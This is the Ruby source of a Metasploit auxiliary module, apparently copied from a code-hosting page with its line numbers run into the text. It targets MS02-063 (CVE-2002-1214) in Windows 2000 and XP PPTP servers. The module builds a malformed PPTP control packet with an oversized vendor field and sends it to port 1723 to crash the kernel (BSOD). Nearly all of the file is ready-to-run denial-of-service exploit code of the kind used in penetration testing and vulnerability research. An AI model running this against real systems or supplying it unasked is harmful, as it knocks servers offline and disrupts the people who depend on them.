Path: blob/master/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb
19515 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(11update_info(12info,13'Name' => 'MS02-063 PPTP Malformed Control Data Kernel Denial of Service',14'Description' => %q{15This module exploits a kernel based overflow when sending abnormal PPTP Control Data16packets to Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers17(Remote Access Services). Kernel memory is overwritten resulting in a BSOD.18Code execution may be possible however this module is only a DoS.19},20'Author' => [ 'aushack' ],21'License' => MSF_LICENSE,22'References' => [23[ 'BID', '5807' ],24[ 'CVE', '2002-1214' ],25[ 'OSVDB', '13422' ],26[ 'MSB', 'MS02-063' ],27],28'DisclosureDate' => '2002-09-26',29'Notes' => {30'Stability' => [CRASH_OS_DOWN],31'SideEffects' => [],32'Reliability' => []33}34)35)3637register_options(38[39Opt::RPORT(1723),40]41)42end4344def run45connect4647# Fields borrowed from Wireshark :)48sploit = "\x00\x9c" # length49sploit << "\x00\x01" # control message50sploit << "\x1a\x2b\x3c\x4d" # cookie51sploit << "\x00\x01" # start control connection req52sploit << "\x00\x00" # reserved53sploit << "\x01\x00" # protocol version54sploit << "\x00\x00" # reserved55sploit << "\x00\x03" # framing capabilities56sploit << "\x00\x00\x00\x02" # bearer capabilities57sploit << "\xff\xff" # max channels58sploit << "\x0a\x28" # firmware revision59sploit << "\x00\x01" # Hostname60sploit << 'A' * 3000 # Vendor - trigger vuln6162print_status('Sending PPTP DoS Packet...')6364sock.put(sploit)6566print_status('Packet sent. Kernel should halt on a Stop Error (BSOD).')6768disconnect69end70end717273